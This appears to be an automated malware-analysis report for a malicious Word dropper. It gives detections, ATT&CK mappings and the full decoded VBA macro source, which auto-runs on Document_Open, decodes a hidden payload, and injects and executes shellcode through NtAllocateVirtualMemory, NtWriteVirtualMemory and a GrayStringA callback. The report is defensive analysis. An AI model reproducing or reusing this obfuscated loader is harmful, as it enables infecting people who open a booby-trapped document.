MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic and the presence of VBA macros indicate a malicious dropper. The Document_Open macro is a common technique for initiating malicious actions upon opening the document. Although the VBA script is heavily obfuscated, its structure suggests it attempts to download and execute a second-stage payload, likely leveraging the benign URLs for metadata rather than actual C2 communication.
Heuristics 4
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim phryne As Integer -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13507 bytes |
SHA-256: 292a3081777ffb38ad4874b0aa08e70da58f8154da9255f9afebb325b3458a6f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub shindig()
Dim iodination As Byte
Dim collinsonia As String
broad = ThisDocument.ComputeStatistics(wdStatisticPages)
petrous.behaviorist.Value = broad + 9
vitiation = "ch" & "essm" & "an"
organizationally = "ac" & "cepted"
Set bathrobe = petrous.behaviorist.SelectedItem
footfault = 9
appliance = 25298
silvex = 187158
tetrasaccharide = NPer(75 / 678, footfault, -34342, silvex, 0)
caporal = bathrobe.Name
verdure = 5844
seagreen = Right(caporal, verdure)
porthole = slander.sapling(seagreen)
lolly = 3
shenanigan = 196
stercorariidae = 14329
patzer = 257898
patzer = SYD(patzer, stercorariidae, shenanigan, lolly)
vapor = "fr" & "ench" & "horn"
ashore = "departing"
#If Win64 Then
Dim ataxia As Variant
Dim annum As LongPtr
Dim vivify As LongPtr
Dim chimes As Variant
#Else
Dim planetstruck As Integer
Dim vivify As Long
Dim dolmas As Integer
Dim annum As Long
#End If
chiasmus = 0
blague = "luniform"
noli = 4096
gekkonidae = 5
barkantine = 216
indefective = 25683
wearer = 230264
wearer = SYD(wearer, indefective, barkantine, gekkonidae)
earthshaking = "ex" & "acti" & "on"
deprivation = "asia"
basidiomycete = "aer" & "ifict" & "ion"
important = "arescent"
amulet = 6
chirpiness = 352
hydrilla = 33193
discursory = 238962
discursory = SYD(discursory, hydrilla, chirpiness, amulet)
boniness = porthole
purgatorial = "carbuncled"
botanomancy = "outset"
annum = fingerspelling(boniness)
plethodontidae = "anapsid"
scatter = "bugbane"
#If Win64 Then
Dim akimbo As Variant
Dim dodge As LongPtr
avibus = "quartet"
embalm = "pensiveness"
Dim shamefulness As LongPtr
charabancs = 46 + 26 + 1240
#Else
involuntarily = "th" & "amnophilus"
capitular = "bearish"
exteriority = "omitted"
Dim dodge As Long
fellows = 12 + 483
Dim shamefulness As Long
charabancs = fellows + 2659
#End If
Dim causatives As String
Dim cerous As Long
dodge = 40 - 37 - 3
vivify = annum + charabancs
shamefulness = 22 - 29 + 112 - 104
tombe = adj(shamefulness, shamefulness, vivify, dodge, shamefulness, dodge, dodge, dodge, dodge)
adrenocortical = 98
infinity = 2721
dolmen = 318979
perfective = NPer(84 / 716, adrenocortical, -22874, dolmen, 0)
End Sub
Sub IterateOpenForms()
Dim frm As Form
For Each frm In Forms
'Print the name of the referenced form to the Immediate window
Debug.Print frm.Name
Next frm
End Sub
Function hewers(adorned, abutilon, ammotragus)
#If Win64 Then
Dim euphemistically As Integer
Dim palinode As Integer
Dim calced As LongPtr
Dim benzoate As LongPtr
Dim cauterization As LongPtr
Dim autopilot As Integer
Dim acrefoot As LongPtr
Dim breakage As LongPtr
#Else
Dim benzoate As Long
Dim differentiation As Variant
Dim calced As Long
Dim sent As Integer
Dim acrefoot As Long
Dim compense As Long
Dim cauterization As Long
Dim stoneware As Integer
Dim breakage As Long
Dim meagerness As Byte
Dim carapace As Byte
#End If
wonderfully = wonderfully
nakedwood = Fix(51)
benzoate = adorned
breakage = ammotragus
wonderfully = "intransmutable"
acrefoot = abutilon
propoxyphene = 84
entete = 31605
uraninite = 229852
dryopteris = NPer(70 / 745, propoxyphene, -8766, uraninite, 1)
sm = asepsis + 469
calced = 30 + 102 - 16 - 117
nigroporus ByVal calced, benzoate, acrefoot, breakage, cauterization
sm = Fix(196)
End Function
Private Sub Document_Open()
Dim phryne As Integer
Dim forepart As Long
mature = "ela" & "stoplast"
canonized = "dev" & "eloped"
shindig
guet = 7
anatolian = 135
busybody = 45279
patronage = 586252
patronage = SYD(patronage, busybody, anatolian, guet)
End Sub
Function fingerspelling(kenya)
Dim bryopsida As Integer
Dim goddaughter As Byte
Dim famous As Byte
Dim adroitly As String
#If Win64 > 0 Then
Dim blandae As Integer
Dim astasia As LongPtr
redwood = 18 - 92 - 87 + 169
Dim clamshell As LongPtr
Dim betterment As Variant
Dim recognizable As Long
Dim protective As LongPtr
Dim corgi As Long
#Else
Dim supposed As Integer
Dim astasia As Long
redwood = 75 + 101 - 172
Dim clamshell As Long
Dim goner As String
Dim protective As Long
Dim tangelo As Integer
Dim myrmecophyte As String
#End If
seychelles = VarPtr(astasia)
sinkhole = hewers(seychelles, VarPtr(kenya) + 8, redwood)
achoerodus = -1
clamshell = 5 - 7 - 120 + 122
classical = 77 - 36 + 85 - 126
protective = 109 + 9345
blowtorch = 5 - 99 + 4190
gruntle = 64
dichroism = ararat(ByVal achoerodus, clamshell, ByVal classical, protective, ByVal blowtorch, ByVal gruntle)
choleric = fibula
sm = Rnd(436)
hewers clamshell, astasia, 128 + 4256
fibrocartilage = 3
powdery = 263
pie = 51249
capricorn = 109475
capricorn = SYD(capricorn, pie, powdery, fibrocartilage)
fingerspelling = clamshell
End Function
Attribute VB_Name = "slander"
' Maybe if the stars align, maybe if our worlds collide
' I miss you so much, I miss you so much
#If Win64 Then
' He was a dreamer at heart
'
Public Declare PtrSafe Function boarder Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal excessive As LongPtr,attune As LongPtr,durmast As LongPtr,secretiveness As LongPtr,twoway As LongPtr) As Boolean
' Chasing after danger, making my heart race, woah
' He was a dreamer at heart
Public Declare PtrSafe Function arctiid Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (fancier As LongPtr, humid As Any,leucine As LongPtr, intercommunion As Any) As Boolean
'
' Maybe on the dark side we can be together, be together
Public Declare PtrSafe Function adj Lib "User32.dll" Alias "GrayStringA" ( ByVal adnate As Any, ByVal selfopinioned As Any, ByVal unwaxed As Any, ByVal needlework As Any, ByVal backstairs As Any, ByVal fore As Any, ByVal oast As Any, ByVal everything As Any, ByVal starry As Any) As Long
' Baby I'm yours, baby I'm yours
' Maybe in a million miles, on a highway through the skies
Public Declare PtrSafe Function buchloe Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sarum As LongPtr)
' He was a dreamer at heart
' I miss you so much, I miss you so much
Public Declare PtrSafe Function dioxide Lib "Shell32.dll" Alias "SHGetSettings" (aye As LongPtr,dekaliter As LongPtr) As LongPtr
' He was a dreamer at heart
' I miss you so much, I miss you so much
Public Declare PtrSafe Function agastache Lib "Shlwapi.dll" Alias "PathFileExists" (freelance As LongPtr) As LongPtr
' He was a dreamer at heart
' I miss you so much, I miss you so much
Public Declare PtrSafe Function nigroporus Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal sachet As Any, ByVal alstroemeriaceae As Any, ByVal chantey As Any, ByVal excretion As Any, ByVal amorphous As Any) As LongPtr
' He was a dreamer at heart
' I miss you so much, I miss you so much
Public Declare PtrSafe Function ararat Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (dinnertime As LongPtr, myxomycota As LongPtr, ByVal angler As LongPtr,denaturedByVal As LongPtr, expensiveness As LongPtr, ByVal womanizer As LongPtr) As LongPtr
' He was a dreamer at heart
' I miss you so much, I miss you so much
' He was a dreamer at heart
' I miss you so much, I miss you so much
#Else
' He was a dreamer at heart
' I miss you so much, I miss you so much
Public Declare Function depletion Lib "Shlwapi.dll" Alias "PathFileExists" (tenet As Long) As Long
'
' Maybe if the stars align, maybe if our worlds collide
Public Declare Function ararat Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (mossy As Long, resolve As Long, ByVal glossary As Long, delinquentByVal As Long, chaffinch As Long, ByVal meditatively As Long) As Long
'
'
Public Declare Function nigroporus Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal cobber As Any, ByVal airpipe As Any, ByVal beethoven As Any, ByVal bullfight As Any, ByVal loupe As Any) As Long
'
' Maybe on the dark side we can be together, be together
Public Declare Function repicolous Lib "Shell32.dll" Alias "SHGetSettings" (acantholysis As Long, seapiece As Long) As Long
'
' I miss you so much, I miss you so much
Public Declare Function clothed Lib "Shell32.dll" Alias "SHGetDesktopFolder" (prandial As Long)
'
'
Public Declare Function nuphar Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (confoundedly As Long, chinks As Any, criminologist As Long, adduction As Any) As Boolean
' I miss you so much, I miss you so much
' Tell me, is this freedom, baby?
Public Declare Function indicated Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal byzantine As Long, sacrilegiousness As Long, astrantia As Long, manumission As Long, uprise As Long) As Boolean
' Wings spread to the sun
'
Public Declare Function adj Lib "User32.dll" Alias "GrayStringA" (ByVal acidophil As Any, ByVal pachyrhizus As Any, ByVal viscaceae As Any, ByVal controversy As Any, ByVal argufy As Any, ByVal advantage As Any, ByVal philately As Any, ByVal doting As Any, ByVal piaster As Any) As Long
' I miss you so much, I miss you so much
' Love don't come easy at all
' Chasing the stars, chasing the stars
'
#End If
'
' Maybe if the stars align, maybe if our worlds collide
Function flared(secretariat)
flared = AscW(secretariat)
End Function
Sub wheresel()
If Selection.Information(wdAtEndOfRowMarker) = True Then _
Selection.MoveLeft Unit:=wdCharacter, Count:=1
End Sub
Function wuther(undeclared, altorilievo, arm)
Select Case arm
Case 39
wuther = undeclared \ altorilievo
Case 49
wuther = undeclared And altorilievo
Case 57
wuther = undeclared * altorilievo
End Select
End Function
Function sapling(amusing) As String
Dim novello() As Byte
Dim acidic As String
Dim indispose(63) As Long
Dim due As Long
Dim bowel(6965) As Byte
Dim unlaureled As String
Dim squareness(63) As Long
Dim fissibility As Byte
Dim autoplastic(63) As Long
fibula = choleric
Dim characteristic As Long
nakedwood = bruit - 270
Dim anergy As Long
Dim abhenry As Long
wonderfully = fibula
Dim touch As Byte
Dim flatware As Integer
Dim canonize As Long
christmas = 65280
pessimal = 7 + 4089
Dim gasconading As Integer
Dim articular As Long
Dim ovary As Integer
halocarpus = 73 + 114 - 70 + 257931
cite = 63
likes = 75 + 66 + 52 + 65343
bastardized = 85 + 16514987
rhincodon = 84 + 28 + 67 + 77
assiduously = 43 + 84 + 14 + 114
carboloy = 50 + 97 + 3885
scrambling = 70 + 60 + 262014
acidify = 16711680
pardon = 64
Dim legalism As Variant
garcinia = 101 + 108 - 128 - 81
extenuated = 5843
Dim facially() As Byte
Dim demoniac As Variant
facially = VBA.Strings.StrConv(amusing, vbFromUnicode)
Dim acervation As Integer
budorcas = 2
nem = 223
ammoniac = 11441
cheliferous = 553797
cheliferous = SYD(cheliferous, ammoniac, nem, budorcas)
puppyism = 5843
northernmost = Sqr(RGB(0, 1, 0))
For prismoid = 0 To puppyism
If prismoid Mod 2 = 0 Then
facially(prismoid) = facially(prismoid) + northernmost
Else
facially(prismoid) = facially(prismoid) + northernmost - 1
End If
Next prismoid
disseize = 8
newly = 341
esocidae = 12389
mutter = 521936
mutter = SYD(mutter, esocidae, newly, disseize)
flatware = 0
goldbricking = 84 - 84
motheaten = 43
subclass = cyst
For abhenry = 0 To 63
indispose(abhenry) = wuther(abhenry, pardon, 57)
squareness(abhenry) = wuther(abhenry, pessimal, 57)
autoplastic(abhenry) = wuther(abhenry, scrambling, 57)
Next abhenry
imitated = 65
continuing = 14966
dorser = 387811
abbreviate = NPer(79 / 589, imitated, -20064, dorser, 1)
novello = facially
diffuse = 4
bodybuilding = 6
apios = 357
leafed = 16129
reagan = 305994
reagan = SYD(reagan, leafed, apios, bodybuilding)
callinectes = 3
nakedwood = Fix(323)
fibula = "monument"
outspread = callinectes + 1
extenuate = 109 - 107
For characteristic = 0 To puppyism
geotic = novello(characteristic)
counterinsurgency = novello(characteristic + 2)
due = autoplastic(subclass(geotic)) _
+ squareness(subclass(novello(characteristic + 1))) + indispose(subclass(counterinsurgency)) + subclass(novello(characteristic + callinectes))
abhenry = wuther(due, acidify, 49)
bowel(canonize) = wuther(abhenry, likes, 39)
abhenry = wuther(due, christmas, 49)
bowel(canonize + 1) = wuther(abhenry, rhincodon, 39)
bowel(canonize + extenuate) = wuther(due, assiduously, 49)
canonize = canonize + extenuate + 1
characteristic = characteristic + 3
Next
sapling = bowel
End Function
Function cyst()
Dim mixtura(255) As Byte
chelydra = 65
Do
mixtura(chelydra) = chelydra - 65
chelydra = chelydra + 1
Loop Until chelydra = 91
chelydra = 48
Do
mixtura(chelydra) = chelydra + 4
chelydra = chelydra + 1
Loop Until chelydra = 58
chelydra = 97
Do
mixtura(chelydra) = chelydra - 71
chelydra = chelydra + 1
Loop Until chelydra = 123
mixtura(47) = 63
chelydra = 43
mixtura(chelydra) = 62
cyst = mixtura
End Function
Attribute VB_Name = "petrous"
Attribute VB_Base = "0{251FA6CC-669C-4E05-A4E9-53108C24B81C}{1165EBC0-DA34-44E4-BFA6-C474BC3D9584}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.